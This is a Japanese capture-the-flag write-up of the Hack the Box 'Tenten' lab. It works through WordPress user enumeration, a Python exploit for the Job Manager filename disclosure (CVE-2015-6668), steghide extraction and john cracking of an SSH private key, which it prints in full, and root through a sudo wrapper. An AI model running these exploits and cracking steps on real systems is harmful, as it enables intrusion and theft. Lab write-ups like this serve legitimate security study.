【Hack the Box write-up】Tenten

July 02, 2020

はじめに

筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

machine について

難易度は medium です スクリーンショット 2020-07-02 1.34.56.png

nmap

# Nmap 7.80 scan initiated Wed Jul  1 04:18:12 2020 as: nmap -vv --reason -Pn -sV -sC --version-all -oN /home/kali/results/10.10.10.10/scans/_quick_tcp_nmap.txt -oX /home/kali/results/10.10.10.10/scans/xml/_quick_tcp_nmap.xml 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up, received user-set (0.26s latency).
Scanned at 2020-07-01 04:18:12 EDT for 36s
Not shown: 998 filtered ports
Reason: 998 no-responses
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD0ZxDYLkSx3+n8qOc+tpjAd+KZ8STcHdayXH5Vn7gRhiI6toUP53yvS4ysmU4uq/QkX+oAJabm3H2WdVDySKvLVitCstPErNjKmi3Zr4ROlJVyv25eR0Wuo42PqDRCB0DN5SBZsoylDM1FN53ZTdiTC4Da4NM/3zfXzJgBpo8NdRyCZJnTufOdR8x4RE/0QU6UZR1cJPKKNmS/7qzHtMDZx5MM0li07d77mDpUoMCxPGCWlH5VsgpKBUSvdzd5xjilN5/tU/uwgL4FLTcMJF6DPDORYxJWjGO8ThSm8nf+kgxdv1iSF3olv++tReoWjVZy/xrEIdgHTcPjGggldR9v
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBERpTI9NMPamS6NaoLL5Y/nq+T19q1KR6GgtbsnmjCTtnGBKlaGI46uCPIYZwQ0MFDRg1hxq13rhLxl7JPIEjWU=
|   256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIOrtl+D1cRlO2WrvblMacn5J5/rh+PTJmgxDwkBBfg7
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul  1 04:18:48 2020 -- 1 IP address (1 host up) scanned in 36.62 seconds

wpscan

80 番に wordpress が動作しているので wpscan を実行します

kali@kali:~$ wpscan --url http://10.10.10.10 --enumerate u

(省略)

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:02 <=============================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] takis
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

(省略)

takisが見つかりました

kali@kali:~$ wpscan --url http://10.10.10.10 --api-token ***********************

(省略)
 | [!] title: Job Manager <= 0.7.25 -  Insecure Direct Object Reference
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8167
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6668
 |      - https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/

(省略)

cve-2015-6668 を試す

以下のページの解説通りにやってみます(詳細略) https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/

http://10.10.10.10/index.php/jobs/apply/13/を閲覧すると以下の 1 つだけ明らかに怪しい求人が見つかります。

スクリーンショット 2020-07-02 1.03.39.png

HackerAccessGranted って怪しすぎますね…

filename を HackerAccessGranted にして上のページ内で紹介されているスクリプトを実行して file を探してみます

import requests

print """
CVE-2015-6668
title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
"""
website = raw_input('Enter a vulnerable website: ')
filename = raw_input('Enter a file name: ')

filename2 = filename.replace(" ", "-")

for year in range(2017,2018):
    for i in range(1,13):
        for extension in {'doc','jpg','txt','pdf','docx'}:
            print("start")
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
            req = requests.get(URL)
            if req.status_code==200:
                print "[+] URL of CV found! " + URL

(一部修正しています、拡張子のとことか year のとことか)

kali@kali:~$ python exploit.py

CVE-2015-6668
title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25

Enter a vulnerable website: http://10.10.10.10
Enter a file name: HackerAccessGranted

[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg

いい感じに file が見つかったので wget で落とします

kali@kali:~$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
--2020-07-01 11:32:48--  http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
Connecting to 10.10.10.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 262408 (256K) [image/jpeg]
Saving to: ‘HackerAccessGranted.jpg’

HackerAccessGranted.jpg                                    100%[=======================================================================================================================================>] 256.26K  82.5KB/s    in 3.1s

2020-07-01 11:32:53 (82.5 KB/s) - ‘HackerAccessGranted.jpg’ saved [262408/262408]

画像を調べる

画像としては特になんの情報もないものでした。

画像から情報を抜き出すと言うことなのでステガノグラフィを疑ってみます

http://pied-piper.net/note/note.cgi?23

kali@kali:~$ steghide extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".

(passphrase なしで OK でした)

id_rsa が出てきました

id_rsa を調べる

kali@kali:~$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C

/HXcUBOT3JhzblH7uF9Vh7faa76XHIdr/Ch0pDnJunjdmLS/laq1kulQ3/RF/Vax
tjTzj/V5hBEcL5GcHv3esrODlS0jhML53lAprkpawfbvwbR+XxFIJuz7zLfd/vDo
1KuGrCrRRsipkyae5KiqlC137bmWK9aE/4c5X2yfVTOEeODdW0rAoTzGufWtThZf
K2ny0iTGPndD7LMdm/o5O5As+ChDYFNphV1XDgfDzHgonKMC4iES7Jk8Gz20PJsm
SdWCazF6pIEqhI4NQrnkd8kmKqzkpfWqZDz3+g6f49GYf97aM5TQgTday2oFqoXH
WPhK3Cm0tMGqLZA01+oNuwXS0H53t9FG7GqU31wj7nAGWBpfGodGwedYde4zlOBP
VbNulRMKOkErv/NCiGVRcK6k5Qtdbwforh+6bMjmKE6QvMXbesZtQ0gC9SJZ3lMT
J0IY838HQZgOsSw1jDrxuPV2DUIYFR0W3kQrDVUym0BoxOwOf/MlTxvrC2wvbHqw
AAniuEotb9oaz/Pfau3OO/DVzYkqI99VDX/YBIxd168qqZbXsM9s/aMCdVg7TJ1g
2gxElpV7U9kxil/RNdx5UASFpvFslmOn7CTZ6N44xiatQUHyV1NgpNCyjfEMzXMo
6FtWaVqbGStax1iMRC198Z0cRkX2VoTvTlhQw74rSPGPMEH+OSFksXp7Se/wCDMA
pYZASVxl6oNWQK+pAj5z4WhaBSBEr8ZVmFfykuh4lo7Tsnxa9WNoWXo6X0FSOPMk
tNpBbPPq15+M+dSZaObad9E/MnvBfaSKlvkn4epkB7n0VkO1ssLcecfxi+bWnGPm
KowyqU6iuF28w1J9BtowgnWrUgtlqubmk0wkf+l08ig7koMyT9KfZegR7oF92xE9
4IWDTxfLy75o1DH0Rrm0f77D4HvNC2qQ0dYHkApd1dk4blcb71Fi5WF1B3RruygF
2GSreByXn5g915Ya82uC3O+ST5QBeY2pT8Bk2D6Ikmt6uIlLno0Skr3v9r6JT5J7
L0UtMgdUqf+35+cA70L/wIlP0E04U0aaGpscDg059DL88dzvIhyHg4Tlfd9xWtQS
VxMzURTwEZ43jSxX94PLlwcxzLV6FfRVAKdbi6kACsgVeULiI+yAfPjIIyV0m1kv
5HV/bYJvVatGtmkNuMtuK7NOH8iE7kCDxCnPnPZa0nWoHDk4yd50RlzznkPna74r
Xbo9FdNeLNmER/7GGdQARkpd52Uur08fIJW2wyS1bdgbBgw/G+puFAR8z7ipgj4W
p9LoYqiuxaEbiD5zUzeOtKAKL/nfmzK82zbdPxMrv7TvHUSSWEUC4O9QKiB3amgf
yWMjw3otH+ZLnBmy/fS6IVQ5OnV6rVhQ7+LRKe+qlYidzfp19lIL8UidbsBfWAzB
9Xk0sH5c1NQT6spo/nQM3UNIkkn+a7zKPJmetHsO4Ob3xKLiSpw5f35SRV+rF+mO
vIUE1/YssXMO7TK6iBIXCuuOUtOpGiLxNVRIaJvbGmazLWCSyptk5fJhPLkhuK+J
YoZn9FNAuRiYFL3rw+6qol+KoqzoPJJek6WHRy8OSE+8Dz1ysTLIPB6tGKn7EWnP
-----END RSA PRIVATE KEY-----

ENCRYPTEDになっています。

kali@kali:~$ openssl rsa -in id_rsa -out decrypted
Enter pass phrase for id_rsa:

pass phrase がわかりません。

john で bruteforce することにします https://www.abhizer.com/crack-ssh-with-john/

kali@kali:~$ /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
kali@kali:~$ sudo john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword    (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:10 DONE (2020-07-01 11:45) 0.09624g/s 1380Kp/s 1380Kc/s 1380KC/sa6_123..*7¡Vamos!
Session completed

superpasswordが出てきました、これで decrypt します

kali@kali:~$ openssl rsa -in id_rsa -out decrypted
Enter pass phrase for id_rsa:
writing RSA key
kali@kali:~$ cat decrypted
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAsqVYL/kkuvngLK2su/ybmK20lMTx5sX5QqIAWxQo82HIhXF/
Odn59y2f0/r8or6V0Zufd1Q+6vWY5qqGppzBb4PY0mLxqnAbklTt3JtMDiwC+2Pk
+zbKdAfuz9LVy1UftEzRgGaZX0EIjyIqtUUwfnOtcaKOT3nG8w00UP/QvV1Knte3
l0bN/QrU20FmN4CCFQNdFyfGAXg/Bmcb6mSdl2JmK4luS4phPUnSNYd1877/MuF8
xQiGdaXkCDtB9cDh9mqg/MQsr2LuYVB0Zwx1WeGqGlmtpuBeYnR7Ckz/KcFVJa28
21GjMza+9PeGYLMoY/UH4V3qs3vU34F6L7zBuQIDAQABAoIBAHPfIxAavWQ5ZtoT
3BIiipnBMXu9MlnI1yANC8YHkXgrWHCVaTwQ0j0s7poEFZFJpMtL8Wbo0dZ8bixP
Nv8idaTrE9uCKdWu2XNUeuO4JuCaU2TTKlZ292HDM3bA/cLg96tumAR8h8Zs3Cxa
sPDaa9XZGgq2sS+DgTNswR44jyADKUmp3mz3rCaFfzB+yy2aZ8ZpMEvd99AEdyha
ULDAMqp7t9FC4sz7ZYuN5HORvPDy6hbp5dHjLJK1vOGx8Aji1hxDKEpWvlVarlGc
etZMooEsxbQDd/ZraYv7cE041RtpHkoD9syjVWXFulG7D7koFo9aDlW/EQBj0eu9
pxdBpAECgYEA2YQ5i2kj+NvG2C90Pyu4oCFK20aI1Xh2W2RiL+CHqgr0DEQj6BF7
AQ2PojOnxYtXlwz2+CL6YTMdxkNFNyXT6TsRnKRADa2SQ0EtrZm82C+C7V1wugml
fGOZpuSA+2Ep37PTjzYObpl3DDbnCHqbDGIbe/F7JlQyIeqyMaAvMJkCgYEA0kCW
j0qxlKcrbe2mfZ8gknm/1o5DttpO3EGtFcqZNwgLYJhLUIIAniCHuEX2O97OG0Rp
4BQQtVQOFLcRish9ITUvaTMosnV2jSHaeyTbEE2FaGVD132B/tWbhQJnCpNKxXm9
dWeg5tUu3v+OQTdAzGT/scJGmhL9wThPsB3MLiECgYEAuwt9AGj1SfaT0ytbZ0cN
iIWYfV72I7tm68gytsD5aDvrCPE/fzwo7grfTLfmuXTNaVL4vQA3FoaCQA9w4a9h
vtnQl0aW3iw37iWKRhJB1hVlHQCRAylwaLqtUlqEn6Y5/+f/MNNnLaxCNvqvSRdF
ZSyoPbi2EYutYIUVnp8EdWECgYEAkkJn+ipFullINuJ5TS4jJIIZV5IDvPHEpifx
1hTn3IZ2E64dxlWJRHbwstnIXwGxcvp2hHCw5tMgMHzhcR/jG/S5lH8IMozP+YGx
ULTkx0SGJ4c6WG9wvOuvkimHsK2h+BmmGEQMhEeMoYg5V1iudQFVdjzljEzlxUH8
/VDdNsECgYB8aFw95yQHto336huxD9aNrOckNB2bQ2xQiHzGBc+FW6saUo54P6mf
9I7LfboKMGv6aEKBSbn9s5lpsdEms3JMYy4dFAc5TE+kCIV3Nl4bVR0Sc7Su6uOr
ipUvut20MV5Kw45q+/nzNhNrHFEhAlsJH5HQ7c5qdApX+AAtWf8udA==
-----END RSA PRIVATE KEY-----

ssh する

先ほど wpscan で takis と言うユーザーが出てきていたのでそれでログインを試します。

kali@kali:~$ ssh -i decrypted [email protected]
The authenticity of host '10.10.10.10 (10.10.10.10)' can't be established.
ECDSA key fingerprint is SHA256:AxKIYOMkqGk3v+ZKgHEM6QcEDw8c8/qi1l0CMNSx8uQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.10' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

65 packages can be updated.
39 updates are security updates.


Last login: Fri May  5 23:05:36 2017
takis@tenten:~$

これで user.txt が取れます

PE

takis@tenten:~$ sudo -l
Matching Defaults entries for takis on tenten:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin

よくわからんファイルが NOPASSWD で指定されています

takis@tenten:~$ cat /bin/fuckin
#!/bin/bash
$1 $2 $3 $4

調べてみるとオプションで渡したコマンドをそのまま実行してくれるっぽいです

takis@tenten:~$ sudo /bin/fuckin /bin/bash
root@tenten:~#

/bin/bash を指定することで root のシェルが取れます

終わりに

割と easy めのマシンでした!

このエントリーをはてなブックマークに追加